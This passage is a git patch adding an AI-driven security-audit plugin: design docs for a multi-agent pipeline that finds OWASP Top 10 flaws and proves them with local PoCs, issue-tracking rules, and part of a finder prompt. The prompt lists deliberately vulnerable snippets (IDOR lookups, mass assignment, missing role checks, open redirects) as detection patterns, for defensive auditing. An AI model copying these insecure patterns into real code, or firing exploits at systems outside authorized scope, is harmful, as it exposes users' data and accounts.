From dd230c77f5e78366685411d3db8592f18c458442 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 08:02:57 +0000
Subject: [PATCH 1/5] Add security plugin (vulnerability audit)

White-box, dynamically-verified security audit. /security:audit recons a target
repo, hunts OWASP Top 10:2025 vulnerabilities, proves them with live PoCs in
isolated git worktrees, and writes a high-signal senior-engineer report (proven
findings with a high-level proposed fix, not speculative noise).
---
 .claude-plugin/marketplace.json               |   8 +
 README.md                                     |   1 +
 plugins/security/.claude-plugin/plugin.json   |  13 +
 plugins/security/AGENTS.md                    | 197 +++++++
 plugins/security/README.md                    |  76 +++
 plugins/security/docs/issue-tracking.md       | 104 ++++
 .../prompts/finders/access-control.md         | 290 +++++++++++
 .../security/prompts/finders/auth-session.md  | 391 ++++++++++++++
 plugins/security/prompts/finders/crypto.md    | 324 ++++++++++++
 plugins/security/prompts/finders/csrf-cors.md | 346 ++++++++++++
 .../prompts/finders/deserialization.md        | 338 ++++++++++++
 plugins/security/prompts/finders/dos-redos.md | 339 ++++++++++++
 plugins/security/prompts/finders/injection.md | 300 +++++++++++
 .../prompts/finders/logging-errors.md         | 355 +++++++++++++
 plugins/security/prompts/finders/misconfig.md | 312 +++++++++++
 plugins/security/prompts/finders/path-file.md | 337 ++++++++++++
 plugins/security/prompts/finders/secrets.md   | 311 +++++++++++
 plugins/security/prompts/finders/ssrf.md      | 251 +++++++++
 .../security/prompts/finders/supply-chain.md  | 371 +++++++++++++
 plugins/security/prompts/finders/xss-ssti.md  | 300 +++++++++++
 plugins/security/prompts/playbooks/ci-iac.md  | 400 ++++++++++++++
 plugins/security/prompts/playbooks/crystal.md | 257 +++++++++
 .../prompts/playbooks/generic-docker.md       | 408 +++++++++++++++
 plugins/security/prompts/playbooks/go.md      | 411 +++++++++++++++
 .../security/prompts/playbooks/java-jvm.md    | 491 ++++++++++++++++++
 plugins/security/prompts/playbooks/node.md    | 339 ++++++++++++
 plugins/security/prompts/playbooks/php.md     | 399 ++++++++++++++
 plugins/security/prompts/playbooks/python.md  | 335 ++++++++++++
 plugins/security/prompts/playbooks/ruby.md    | 265 ++++++++++
 plugins/security/prompts/playbooks/rust.md    | 458 ++++++++++++++++
 plugins/security/prompts/recon.md             | 222 ++++++++
 plugins/security/prompts/report-template.md   |  91 ++++
 plugins/security/skills/audit/SKILL.md        |  77 +++
 plugins/security/workflows/vuln-audit.js      | 229 ++++++++
 34 files changed, 9346 insertions(+)
 create mode 100644 plugins/security/.claude-plugin/plugin.json
 create mode 100644 plugins/security/AGENTS.md
 create mode 100644 plugins/security/README.md
 create mode 100644 plugins/security/docs/issue-tracking.md
 create mode 100644 plugins/security/prompts/finders/access-control.md
 create mode 100644 plugins/security/prompts/finders/auth-session.md
 create mode 100644 plugins/security/prompts/finders/crypto.md
 create mode 100644 plugins/security/prompts/finders/csrf-cors.md
 create mode 100644 plugins/security/prompts/finders/deserialization.md
 create mode 100644 plugins/security/prompts/finders/dos-redos.md
 create mode 100644 plugins/security/prompts/finders/injection.md
 create mode 100644 plugins/security/prompts/finders/logging-errors.md
 create mode 100644 plugins/security/prompts/finders/misconfig.md
 create mode 100644 plugins/security/prompts/finders/path-file.md
 create mode 100644 plugins/security/prompts/finders/secrets.md
 create mode 100644 plugins/security/prompts/finders/ssrf.md
 create mode 100644 plugins/security/prompts/finders/supply-chain.md
 create mode 100644 plugins/security/prompts/finders/xss-ssti.md
 create mode 100644 plugins/security/prompts/playbooks/ci-iac.md
 create mode 100644 plugins/security/prompts/playbooks/crystal.md
 create mode 100644 plugins/security/prompts/playbooks/generic-docker.md
 create mode 100644 plugins/security/prompts/playbooks/go.md
 create mode 100644 plugins/security/prompts/playbooks/java-jvm.md
 create mode 100644 plugins/security/prompts/playbooks/node.md
 create mode 100644 plugins/security/prompts/playbooks/php.md
 create mode 100644 plugins/security/prompts/playbooks/python.md
 create mode 100644 plugins/security/prompts/playbooks/ruby.md
 create mode 100644 plugins/security/prompts/playbooks/rust.md
 create mode 100644 plugins/security/prompts/recon.md
 create mode 100644 plugins/security/prompts/report-template.md
 create mode 100644 plugins/security/skills/audit/SKILL.md
 create mode 100644 plugins/security/workflows/vuln-audit.js

diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json
index 76b3a07..c03099a 100644
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -12,6 +12,14 @@
       "version": "0.1.0",
       "category": "ruby",
       "keywords": ["ruby", "bundler", "gem", "dependencies"]
+    },
+    {
+      "name": "security",
+      "source": "./plugins/security",
+      "description": "White-box, dynamically-verified security audit. /security:audit recons a repo, hunts OWASP Top 10:2025 vulnerabilities, proves them with live PoCs in isolated worktrees, and writes a high-signal senior-engineer report.",
+      "version": "0.1.0",
+      "category": "security",
+      "keywords": ["security", "pentest", "vulnerability", "audit", "owasp", "appsec"]
     }
   ]
 }
diff --git a/README.md b/README.md
index 5ee7465..0b9e3c1 100644
--- a/README.md
+++ b/README.md
@@ -25,6 +25,7 @@ If the plugin's commands don't show up in the `/` menu, run `/reload-plugins`.
 | Plugin | Description |
 | --- | --- |
 | [gem](plugins/gem) | Ruby gem helpers. Includes `/gem:bump` for changelog-rich dependency bumps. |
+| [security](plugins/security) | Dynamically-verified security audit. `/security:audit` proves vulnerabilities with live PoCs and writes a senior-engineer report. |
 
 ## Developing plugins
 
diff --git a/plugins/security/.claude-plugin/plugin.json b/plugins/security/.claude-plugin/plugin.json
new file mode 100644
index 0000000..0cfc554
--- /dev/null
+++ b/plugins/security/.claude-plugin/plugin.json
@@ -0,0 +1,13 @@
+{
+  "name": "security",
+  "version": "0.1.0",
+  "description": "White-box, dynamically-verified security audit. /security:audit recons a repo, hunts vulnerabilities across the OWASP Top 10:2025 classes, proves them with live PoCs in isolated worktrees, and writes a high-signal senior-engineer report.",
+  "author": {
+    "name": "84codes",
+    "url": "https://github.com/84codes"
+  },
+  "homepage": "https://github.com/84codes/claude-plugins/tree/main/plugins/security",
+  "repository": "https://github.com/84codes/claude-plugins",
+  "license": "MIT",
+  "keywords": ["security", "pentest", "vulnerability", "audit", "owasp", "appsec", "sast"]
+}
diff --git a/plugins/security/AGENTS.md b/plugins/security/AGENTS.md
new file mode 100644
index 0000000..fc21577
--- /dev/null
+++ b/plugins/security/AGENTS.md
@@ -0,0 +1,197 @@
+# vuln-audit — agent & design spec
+
+A Claude Code **skill + workflow** that runs a white-box, dynamically-verified
+security audit of a target repository: a
+multi-phase pipeline (recon → triage → deep review → adversarial verify →
+dynamic repro → report) that produces **proven, high-signal findings with a
+high-level proposed fix**, not speculative noise.
+
+> Read this file before touching the workflow or prompts. It is the source of
+> truth for the data contracts, taxonomy, severity model, and signal policy.
+
+## Invocation
+
+```
+/security:audit /path/to/target-repo [--no-dynamic] [--classes injection,ssrf] [--ref <git-ref>] [--out <dir>]
+```
+
+The skill (`skills/audit/SKILL.md`) is the agent-facing entry point. It parses the
+target, picks a writable `outDir`, preflights host capabilities, then calls the
+workflow (`workflows/vuln-audit.js`) with everything assembled in `args` —
+`toolRoot` = `${CLAUDE_PLUGIN_ROOT}` (read-only, holds the prompts), `outDir` =
+where the bundle is written.
+
+## Pipeline
+
+| Phase | What | Primitive |
+|-------|------|-----------|
+| 1. Recon | Detect stack, map attack surface & trust boundaries, pick run strategy, select relevant finder classes | single agent (`prompts/recon.md`) |
+| 2. Triage | One finder per vuln class scans its surface, emits candidate findings | `parallel()` finders |
+| 3. Dedup | Collapse same-root-cause findings across call sites | plain JS in the workflow |
+| 4. Deep review | Re-examine each candidate with surrounding context (callers, sanitizers, related files); confirm a reachable source→sink path | `pipeline()` stage |
+| 5. Adversarial verify | Independent skeptics, each a distinct lens, try to **refute** the finding; majority-refute kills it | `parallel()` skeptic panel |
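+| 6. Dynamic repro | Survivors are built & run in an isolated git **worktree** of the target (docker-first); a real PoC is fired and impact observed | `agent()` per survivor, which creates its own `git worktree` of the target (the `isolation:'worktree'` option is not used) |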
+| 7. Report | Synthesize the senior-engineer report (`prompts/report-template.md`) | single agent |
+
+## Reference evaluation (why we adopt what we adopt)
+
+- **Anthropic security-guidance** (`code.claude.com/docs/en/security-guidance`)
+  — **adopt methodology.** Validates our core moves: (a) review independence —
+  the reviewer is a *fresh-context* agent, never the author, "instructed only to
+  find problems"; (b) read callers/sanitizers/related files before reporting to
+  keep false positives low. Our tool is the deepest layer: in-session plugin →
+  `/security-review` (branch) → Code Review (PR) → **vuln-audit (on-demand,
+  dynamically verified PoCs)**. We honor its extension convention: if the target
+  has a `.claude/claude-security-guidance.md`, we load it as extra threat-model
+  context.
+- **OWASP Top 10:2025** — **adopt as primary taxonomy.** Current edition; new
+  categories A03 Software Supply Chain Failures and A10 Mishandling of
+  Exceptional Conditions; SSRF folded into A01. Every finder maps to a 2025 ID.
+- **OWASP ASVS v5.0** (17 chapters, ~350 reqs) — **reference only, not a walked
+  checklist.** Walking 350 requirements is exactly the low-signal sidetrack we
+  avoid. Used two ways: (a) coverage map so the finder taxonomy has no blind
+  spots; (b) cite a requirement/chapter ID in findings as a terse, authoritative
+  reference for senior readers.
+- **OpenSSF Scorecard** — **partial adopt, code-exploitable checks only.** Scorecard
+  scores project *hygiene/posture* (Maintained, License, SBOM, Security-Policy,
+  Contributors) — out of scope for findings. But its CI/CD checks ARE real
+  exploitable issues and feed our `supply-chain` finder: Dangerous-Workflow
+  (`pull_request_target` + untrusted checkout, `${{ }}` script injection),
+  Token-Permissions (over-broad `GITHUB_TOKEN`), Pinned-Dependencies (unpinned
+  actions/deps), Vulnerabilities (known-vuln deps via OSV). Posture/process
+  checks are relegated to the Info appendix, never the high-priority body.
+
+## Vuln-class taxonomy (finders)
+
+Each maps to OWASP Top 10:2025 + CWE + an ASVS v5.0 chapter (the CWE IDs are in the
+header of each finder prompt). One prompt file per class under `prompts/finders/<key>.md`.
+
+| key | title | OWASP 2025 | ASVS |
+|-----|-------|-----------|------|
+| access-control | Broken Access Control & IDOR | A01 | V8 |
+| ssrf | Server-Side Request Forgery | A01 | V4 |
+| injection | Injection (SQL/NoSQL/OS/LDAP) | A05 | V1/V2 |
+| xss-ssti | XSS & Template Injection | A05 | V1/V3 |
+| auth-session | Authentication & Session | A07 | V6/V7/V9/V10 |
+| crypto | Cryptographic Failures | A04 | V11 |
+| deserialization | Insecure Deserialization & Integrity | A08 | V2/V15 |
+| path-file | Path Traversal & File Handling | A01 | V5 |
+| secrets | Hardcoded Secrets & Credentials | A02 | V14 |
+| misconfig | Security Misconfiguration | A02 | V13 |
+| supply-chain | Software Supply Chain & CI/CD | A03 | V15 |
+| logging-errors | Logging, Error & Exception Handling | A09/A10 | V16 |
+| dos-redos | Denial of Service & ReDoS | A06 | V2 |
+| csrf-cors | CSRF, CORS & Clickjacking | A01 | V3 |
+
+Beyond the `dos-redos` mapping above, Insecure Design (A06) is cross-cutting and is
+handled in recon/synthesis, not by a grep-able finder.
+
+## Data contracts
+
+### Finding (finders + deep review)
+`id` · `title` · `vuln_class` · `owasp` (A0x:2025) · `cwe` · `asvs` ·
+`severity` (critical|high|medium|low|info) · `status` (confirmed|likely|triage) ·
+`confidence` (low|medium|high) · `file` · `line` · `end_line` ·
+`code_excerpt` · `source` (untrusted origin) · `sink` (dangerous op) ·
+`data_flow` (source→sink, sanitizers noted) · `sanitizers_checked` (mitigations
+verified absent/ineffective — the FP guard) · `rationale` · `exploit_sketch` ·
+`dynamic_poc_plan` · `proposed_fix` (high-level direction of the change, not a
+patch — implementation is left to whoever takes the issue).
+
+After the pipeline, each finding is also stamped with `fp` (stable fingerprint =
+`djb2(vuln_class | file | sink)`, the cross-scan dedup key), `display_id`
+(`<slug>-<CLASS>-<fp4>`, provisional until the courier swaps in the GitHub issue
+number), `status`, `kept`, `reject_reason`, `verdicts`, and `repro`.
+
+### Verdict (adversarial verify)
+`finding_id` · `lens` · `refuted` (bool) · `confidence` · `reasoning`.
+
+### Repro (dynamic verify)
+`finding_id` · `reproduced` (bool) · `method`
+(live-exploit|unit-test|build-only|static-poc) · `environment` ·
+`setup_commands` · `poc` · `observed` (evidence) · `impact` · `notes`.
+
+## Severity model (exploitability × impact)
+
+- **Critical** — remote, unauth → RCE / full data breach / auth bypass; reachable.
+- **High** — low barrier (authenticated or realistic conditions); significant
+  impact (priv-esc, sensitive data, injection with a real sink).
+- **Medium** — unusual conditions or limited impact, or partial mitigations.
+- **Low** — minor info leak, defense-in-depth gap, hard to exploit.
+- **Info** — hygiene/posture, no direct exploit path.
+
+`status` is orthogonal and drives report placement: **confirmed** (dynamically
+reproduced or statically proven + survived verify), **likely** (strong proof, no
+live repro), **triage** (unverified / split verdicts). Only confirmed+likely go
+in the report body; triage goes to an appendix.
+
+## Signal discipline (the anti-noise contract)
+
+The report is for senior engineers. Stay high-signal — enforced in deep review
+and verify:
+
+- Report only issues with a **reachable** path from untrusted input to a
+  dangerous sink. Check for sanitizers/validators/authz on the path first; if
+  present and effective, drop it.
+- No style/lint nits. No generic "defense-in-depth" without a concrete sink. No
+  unreachable/dead code.
+- Posture/process items (missing SECURITY.md, SBOM, license, maintainership) →
+  Info appendix only, never the body.
+- Dedup: one finding per root cause, list N locations.
+- Prefer few proven findings over many speculative ones. Every High+ finding
+  carries a PoC or an explicit source→sink trace.
+
+## Layout
+
+```
+.claude-plugin/plugin.json           # plugin manifest (name: security)
+skills/audit/SKILL.md                 # agent-facing orchestrator (/security:audit)
+workflows/vuln-audit.js              # the Workflow script (the engine)
+prompts/recon.md                     # phase-1 recon prompt
+prompts/finders/<key>.md             # one finder prompt per vuln class
+prompts/playbooks/<key>.md           # per-ecosystem build/run/exploit playbook
+prompts/report-template.md           # the report format (phase 7)
+docs/issue-tracking.md               # output bundle → GitHub issues + naming rules
+```
+(The output bundle is written to a writable `outDir`, NOT into the plugin root,
+which is read-only/ephemeral.)
+
+Schemas live inline in the workflow (the JS sandbox has no filesystem access at
+runtime); prose content lives in `prompts/` so it is editable without touching
+the script, and is passed into the workflow via `args`.
+
+## Output bundle (VM → courier handoff)
+
+The scan runs on a VM and emits a self-contained **bundle** into the writable
+`outDir`; a separate "courier" agent SSHes in, fetches it, and files the
+issues (the courier holds the only GitHub creds — the VM holds none). Bundle:
+
+- `report.md` — the human report (findings referenced by `display_id`).
+- `findings.json` — the structured findings array, verbatim; the machine
+  interface the courier reconciles against, **keyed by `fp`**.
+- `manifest.json` — `{ tool, schema, repo (owner/repo), target_path, ref,
+  commit, slug, date, dynamic, classes_assessed, counts }`; `repo` tells the
+  courier where to file.
+- `evidence/` — optional captured PoC output (repro evidence also lives inline
+  in `findings.json`).
+
+**Issue tracking & the vulnerability ID/naming rules** (scan epic → finding
+sub-issues, reconcile by `fp`, `display_id` = `<slug>-<CLASS>-<issue#>`, the
+courier emitter, and what each host needs) live in
+[`docs/issue-tracking.md`](docs/issue-tracking.md) — the portable source of truth
+that travels with the repo.
+
+## Runtime notes (gotchas)
+
+- **`args` arrives as a JSON string.** The Workflow runtime delivers the `args`
+  payload to the script as a JSON *string*, not a parsed object (verified
+  empirically). `vuln-audit.js` normalizes it (`typeof args === 'string' ?
+  JSON.parse(args) : args`) before reading any input — do not remove this.
+- **Invoke by `scriptPath`, not `name`, mid-session.** Named-workflow discovery
+  only registers files that existed at session start.
+- **Subagents have full tools** (Read/Grep/Bash/Write/ast-grep, and web via
+  ToolSearch) and operate on the *target*; only the orchestration JS is
+  sandboxed. Dynamic repro creates its own `git worktree` of the target — the
+  `isolation:'worktree'` option is about the tool repo and is not used here.
+- **Host adaptivity:** pass `hostNotes` so recon picks a runnable strategy
+  (docker vs native) the host can actually execute.
diff --git a/plugins/security/README.md b/plugins/security/README.md
new file mode 100644
index 0000000..98ea224
--- /dev/null
+++ b/plugins/security/README.md
@@ -0,0 +1,76 @@
+# security (vulnerability audit)
+
+A white-box, **dynamically-verified** security-audit plugin for internal
+pentests. `/security:audit` points at a repo you own, recons it, hunts
+vulnerabilities across the OWASP Top 10:2025 classes, **proves them with live
+PoCs in isolated git worktrees**, and writes a terse, senior-engineer report —
+proven findings with a high-level proposed fix, not speculative noise.
+
+## Install
+
+```
+/plugin marketplace add 84codes/claude-plugins
+/plugin install security@84codes
+```
+
+Then run `/reload-plugins` if the command doesn't appear.
+
+## Usage
+
+```
+/security:audit /abs/path/to/target-repo
+/security:audit /abs/path/to/target-repo --no-dynamic
+/security:audit /abs/path/to/target-repo --classes injection,ssrf,access-control --ref v1.2.0
+/security:audit /abs/path/to/target-repo --out /abs/writable/dir
+```
+
+The output **bundle** is written to `<cwd>/vuln-audit-reports/<slug>/` (or
+`--out`): `report.md` + `findings.json` + `manifest.json` (+ optional `evidence/`).
+
+## How it works
+
+```
+recon → triage → consolidate → deep review → adversarial verify → dynamic PoC → report
+```
+
+| Phase | Purpose |
+|-------|---------|
+| Recon | Detect stack, map attack surface, pick relevant vuln classes + run strategy. |
+| Triage | One finder agent per relevant class emits candidates. |
+| Consolidate | Dedup by root cause, assign IDs, drop low-signal noise. |
+| Deep review | Confirm a reachable source→sink path with no mitigation. |
+| Adversarial verify | Independent skeptics try to refute each finding; majority kills it. |
+| Dynamic PoC | Build + run the target in an isolated worktree; fire a real exploit. |
+| Report | Senior-engineer report: severity-first, reference-backed, PoC-evidenced. |
+
+## Requirements
+
+- `git` (target must be a git repo for worktree isolation + the live-PoC phase).
+- `docker` for dynamic verification (works via `sudo` if the daemon needs it);
+  otherwise repro falls back to unit-test/static PoCs (`--no-dynamic` skips it).
+- No security scanners required — the tool is LLM-native and uses
+  `semgrep`/`gitleaks`/`trivy` only opportunistically if present.
+
+## Output & issue tracking
+
+Findings carry a stable fingerprint (`fp`) and a `display_id`
+(`<slug>-<CLASS>-<n>`). The bundle is designed to be filed to GitHub issues by a
+separate courier step (scan epic + per-finding sub-issues for
+Critical/High/Medium, reconciled by `fp`). See [`docs/issue-tracking.md`](docs/issue-tracking.md).
+
+## Design
+
+Full pipeline spec, vuln-class taxonomy (OWASP 2025 + CWE + ASVS), data
+contracts, and the signal-discipline policy are in
+[`AGENTS.md`](AGENTS.md).
+
+## Safety & scope
+
+Authorized testing only — audit repositories you own or are explicitly cleared
+to test. All PoC traffic is contained to local processes/containers; the tool
+never fires exploits at external hosts, uses real credentials, or exfiltrates
+data.
+
+## License
+
+MIT
diff --git a/plugins/security/docs/issue-tracking.md b/plugins/security/docs/issue-tracking.md
new file mode 100644
index 0000000..94901da
--- /dev/null
+++ b/plugins/security/docs/issue-tracking.md
@@ -0,0 +1,104 @@
+# Output handling — findings → GitHub issues
+
+How a scan's findings become tracked, fixable, closeable GitHub issues. This is
+the source of truth for the **vulnerability ID / naming rules** and the
+scan→courier→GitHub pipeline. (Design locked 2026-06-02.)
+
+## Topology: scanner VM + courier
+
+Scans run on a **VM**; a separate **courier** agent SSHes in, fetches the scan's
+output, and files it to GitHub. The two run on different hosts on purpose:
+
+- The **VM** runs `/security:audit`, handles untrusted code and working exploits, and
+  holds **no GitHub credentials**.
+- The **courier** holds the only GitHub creds, fetches the bundle read-only over
+  SSH, and creates/updates issues. It is a *pure function of the bundle* — it
+  needs no access to the target source or the VM's git state.
+
+## The bundle (the scan→courier interface)
+
+Each scan drops a self-contained bundle in its output directory on the VM (default `<cwd>/vuln-audit-reports/<slug>/`, or `--out`):
+
+| File | Purpose |
+|------|---------|
+| `report.md` | Human report (findings headed by `display_id`). |
+| `findings.json` | Structured findings array, **verbatim**; the machine interface, **keyed by `fp`**. |
+| `manifest.json` | `{ tool, schema, repo (owner/repo), target_path, ref, commit, slug, date, dynamic, classes_assessed, counts }`. `repo` tells the courier where to file. |
+| `evidence/` | Optional captured PoC output (repro evidence also lives inline in `findings.json`). |
+
+## Vulnerability ID / naming rules
+
+- **Fingerprint** `fp = djb2(vuln_class | file | sink)` (lowercased; line number
+  excluded to reduce churn). This is the **stable, cross-scan dedup key** — same
+  bug → same `fp`, computed identically on the VM and the courier with no shared
+  state. Stored on each issue as a `fp:<hash>` label.
+- **Display ID** `<slug>-<CLASS>-<n>` — e.g. `training-tool-AC-42`. `<slug>` is the
+  repo name, `<CLASS>` the short class code (AC, SSRF, INJ, XSS, AUTH, CRYPTO,
+  DESER, PATH, SEC, MISC, SUPPLY, LOG, DOS, CSRF), and **`<n>` is the GitHub issue
+  number**. So `training-tool-AC-42` *is* `84codes/training-tool#42` — one number,
+  both meanings, permanent (GitHub never reuses issue numbers).
+- **Provisional form** `<slug>-<CLASS>-<fp4>` (first 4 hex of `fp`, e.g.
+  `training-tool-AC-b4a0`) — used in the VM-side `report.md` *before* an issue
+  exists. The courier stamps the final `-<issue#>` ID into the issue at filing;
+  `fp` is the glue linking the two forms.
+- Numbers are **not contiguous per class** (GitHub shares the counter with PRs and
+  other issues) — that is fine; the class prefix carries the meaning.
+
+## Issue model
+
+- **Scan issue** (epic), one per run: holds the report + general comments; closes
+  when all its finding sub-issues close.
+- **Finding sub-issue**, one per **Critical / High / Medium** (confirmed+likely).
+  **Low/Info stay in the report appendix — never issues** (same high-signal
+  contract as the report).
+- **Title:** `[Critical] training-tool-AC-42: <short title> (access-control)`.
+- **Body:** the report's finding block (refs · location · PoC · impact ·
+  proposed fix) + backlink to the scan issue + the `fp` marker.
+- **Labels:** `security`, `security-scan` (epic), `sev:{critical,high,medium}`,
+  `vuln:<class>`, `fp:<hash>`, `status:{confirmed,likely}` (verification outcome).
+- **Two distinct "statuses":** *verification* (confirmed/likely — a scan output,
+  carried as the finding's badge + the `status:` label) vs *lifecycle*
+  (open/fixed — owned entirely by the GitHub issue). The **report has no status
+  table**; the scan epic and its sub-issues are the live status.
+- **PoC handling:** repos are private/internal, so full PoC commands go in the
+  issues (the remediation is a high-level *proposed fix*, not a patch). If a
+  target were public, use GitHub Security Advisories for Critical/High instead.
+
+## Reconcile algorithm (idempotent, keyed by `fp`)
+
+For each Critical/High/Medium finding in `findings.json`, look up existing issues
+by the `fp:<hash>` label (`gh issue list --search "label:fp:<fp>" --state all`):
+
+- **no match** → create the finding issue, link it under the scan epic.
+- **open match** → comment "still present in scan `<id>`" (no duplicate).
+- **closed match that still reproduces** → reopen as a regression + comment.
+- **previously open, now absent / not reproduced** (dynamic re-verify) → comment +
+  close.
+
+Re-running the courier on the same bundle is a no-op. The dynamic-repro phase
+doubles as the fix-verifier, so "everything closed when done" is provable, not
+manual.
+
+## Close loop
+
+Fix PRs use `Fixes #N` to auto-close the finding issue on merge; the next scan
+confirms via dynamic re-verify. When all finding sub-issues are closed, the scan
+epic closes.
+
+## Build status
+
+1. **Done (2026-06-02)** — the workflow emits the bundle and stamps `fp` +
+   provisional `display_id`. See `workflows/vuln-audit.js`.
+2. **Not built yet** — the `/security:track <bundle-dir>` courier skill +
+   `gh` emitter. Blocked on `gh` being installed + authed on the courier host.
+3. **Always gated** — creating real issues on a repo needs an explicit go-ahead.
+
+## What each host needs
+
+| Host | Role | Requirements |
+|------|------|--------------|
+| **VM (scanner)** | runs `/security:audit`, produces the bundle | Claude Code · this repo · `git` · `docker` · **no `gh`, no GitHub creds** |
+| **Courier** | fetches bundle, files issues | Claude Code · this repo (for `/security:track`) · **`gh` + `gh auth login`** (token: Issues read/write) · **SSH key to the VM** (`ssh`/`rsync`) · `jq` (optional) |
+
+Sub-issue linking uses GitHub's GraphQL API, which `gh api graphql` covers — no
+extra tooling.
diff --git a/plugins/security/prompts/finders/access-control.md b/plugins/security/prompts/finders/access-control.md
new file mode 100644
index 0000000..bf6a5ef
--- /dev/null
+++ b/plugins/security/prompts/finders/access-control.md
@@ -0,0 +1,290 @@
+# Finder — Broken Access Control & IDOR (`access-control`)
+
+OWASP A01:2025 · CWE-639/862/863/601/915 · ASVS v5.0 V8
+
+## 1. Objective
+
+Hunt for handlers that act on a resource or perform a state change without an
+**ownership/role check that ties the actor to the target**: IDOR (object id
+straight from the request → DB/file lookup with no scope), missing/incorrect
+authorization (`@login_required` ≠ `is_owner`), privilege escalation (role/flag
+set from request, vertical bypass), forced browsing (unguarded admin/internal
+routes), mass assignment (request body bound to a model with sensitive
+attributes), and open redirect (user-controlled `Location`/`returnUrl`).
+
+## 2. Where to look
+
+Map the **router → handler → data access** path. The flaw lives in the handler:
+an untrusted id/role/url reaches a sink with no per-actor check on the path.
+
+- **Route tables / decorators**: `routes.rb`, `config/routes`, Rails
+  `resources`, Sinatra/Kemal/Lucky `get "/x/:id"`, Express `app.get/router.use`,
+  Flask/FastAPI/Django `@app.route`/`urls.py`/`path()`, Gin/Echo/chi
+  `r.GET("/:id")`, Spring `@GetMapping`/`@PreAuthorize`, Laravel
+  `Route::resource`, actix/axum `.route(...)`.
+- **Auth middleware vs. authZ**: a global `authenticate`/`requireLogin`
+  middleware proves *identity*, not *authorization*. The gap is the handler that
+  trusts the authenticated session but never checks the object belongs to that
+  user. Look for routes mounted **outside** the auth middleware (forced
+  browsing) and admin/debug/internal routes with no role gate.
+- **Object lookups keyed by request param**: `find(params[:id])`,
+  `findById(req.params.id)`, `get_object_or_404(pk=request.GET['id'])`,
+  `WHERE id = $1` where `$1` is request-derived, file paths from `req.query`.
+- **Mass assignment**: `Model.update(params)`, `User(**request.json)`,
+  `Object.assign(user, req.body)`, `model.save(req.body)`, struct-tag binding
+  (`c.Bind(&user)`, `json.Unmarshal(body, &user)`), `$request->all()`.
+- **Role / privilege fields**: anything writing `role`, `is_admin`, `isAdmin`,
+  `admin`, `permissions`, `account_type`, `org_id`, `tenant_id`, `user_id`,
+  `owner_id`, `price`, `balance`, `status` from request input.
+- **Redirects**: `redirect(params[:url])`, `res.redirect(req.query.next)`,
+  `RedirectResponse(url)`, `http.Redirect(w,r,url,302)`,
+  `header("Location: $url")`, `sendRedirect`, OAuth/login `returnTo`/`next`/
+  `callback`/`redirect_uri`.
+- **Signals per language**:
+  - **Crystal** (Kemal/Lucky/Amber): `env.params.url["id"]`, `User.find(id)`,
+    `env.redirect params["url"]`; check for an `Authorize`/`before_action`
+    pipe that scopes by `current_user`.
+  - **Ruby/Rails**: `Model.find(params[:id])` vs.
+    `current_user.models.find(...)`; CanCanCan `authorize!`/Pundit
+    `authorize`; `permit!`/`params.permit(...)`; `redirect_to params[:return_to]`.
+  - **Node/TS**: `Model.findById(req.params.id)`, `req.user` trusted but no
+    `where: { userId: req.user.id }`; `{ ...req.body }` spread into update;
+    `res.redirect(req.query.url)`.
+  - **Python**: Django `.get(pk=...)` w/o `.filter(owner=request.user)`;
+    DRF `queryset` without `get_queryset` scoping or `permission_classes`;
+    FastAPI path param → `db.query(Item).get(id)`; `setattr(obj, k, v)` loops.
+  - **Go**: `db.First(&x, c.Param("id"))`, `c.Bind(&u)` then `db.Save(&u)`,
+    role compared as string from header/JWT claim without verification.
+  - **PHP/Laravel**: `Model::find($id)` w/o policy; `$user->update($request->all())`;
+    `Gate`/`@can`/`authorize` absence; `redirect($request->input('url'))`.
+  - **Java/Spring**: `repo.findById(id)` w/o `@PreAuthorize`/owner check;
+    `@ModelAttribute User user` (binder) without `@InitBinder` allow-list;
+    `response.sendRedirect(request.getParameter("url"))`.
+  - **Rust** (axum/actix): `Path(id)` → `sqlx::query!(... WHERE id = ?)` with no
+    `AND owner_id = $session_user`; `Redirect::to(&params.url)`.
+
+## 3. Detection heuristics
+
+The pattern is always: **request-controlled identifier/role/url (SOURCE) reaches
+a resource access, mutation, or redirect (SINK) with no check that the actor is
+entitled to that specific object/operation.**
+
+SOURCES (untrusted): path/query/body params, headers, cookies, JWT/claims that
+are attacker-supplied or unverified, multipart fields, GraphQL args, webhook
+payloads.
+
+SINKS (dangerous ops): ORM/SQL lookup or mutation keyed by the id; file/blob
+fetch by id/path; field assignment of privileged attributes; HTTP redirect;
+admin/internal action dispatch.
+
+- **IDOR — object access without scope**
+
+  ```ruby
+  # Rails — id straight from params, no current_user scope
+  invoice = Invoice.find(params[:id])          # SINK: any id readable
+  send_data invoice.pdf                          # vs. current_user.invoices.find(...)
+  ```
+  ```ts
+  // Express — findById trusts the session for identity, not ownership
+  const doc = await Document.findById(req.params.id);   // SINK
+  res.json(doc);   // no { where: { ownerId: req.user.id } }
+  ```
+  ```python
+  # Django — pk from request, no owner filter
+  order = Order.objects.get(pk=request.GET["id"])   # SINK
+  # safe form: Order.objects.get(pk=..., user=request.user)
+  ```
+  ```go
+  db.First(&account, c.Param("id"))   // SINK: no AND user_id = claims.Sub
+  ```
+
+- **Missing function-level authZ / forced browsing** — route handler does a
+  privileged action with only an authentication gate (or none):
+
+  ```python
+  @app.route("/admin/users/<id>/delete", methods=["POST"])
+  @login_required                      # identity only; no role check
+  def delete_user(id): User.delete(id) # SINK: any logged-in user deletes anyone
+  ```
+  ```java
+  @GetMapping("/internal/metrics")     // mounted outside security filter chain
+  public Metrics metrics() { ... }     // forced browsing
+  ```
+
+- **Privilege escalation via mass assignment** — request body binds onto a model
+  with privileged columns:
+
+  ```ruby
+  user.update(params[:user])            # SINK: params[:user][:admin]=true
+  # safe: params.require(:user).permit(:name, :email)
+  ```
+  ```ts
+  await User.update({ ...req.body }, { where: { id } });  // role/isAdmin writable
+  ```
+  ```go
+  c.Bind(&user); db.Save(&user)         // user.Role from JSON body
+  ```
+  ```php
+  $user->update($request->all());       // no $fillable allow-list / guarded
+  ```
+
+- **Privilege escalation, direct** — role/flag set from request, or self-escalate
+  on own record: `current_user.update(role: params[:role])`, comparing a header/
+  claim string `if req.headers["x-role"] == "admin"`.
+
+- **Open redirect** — user input flows to the redirect target:
+
+  ```ts
+  res.redirect(req.query.next);                 // SINK
+  ```
+  ```python
+  return redirect(request.args["url"])          # SINK
+  ```
+  ```php
+  header("Location: " . $_GET["url"]);          // SINK
+  ```
+  ```ruby
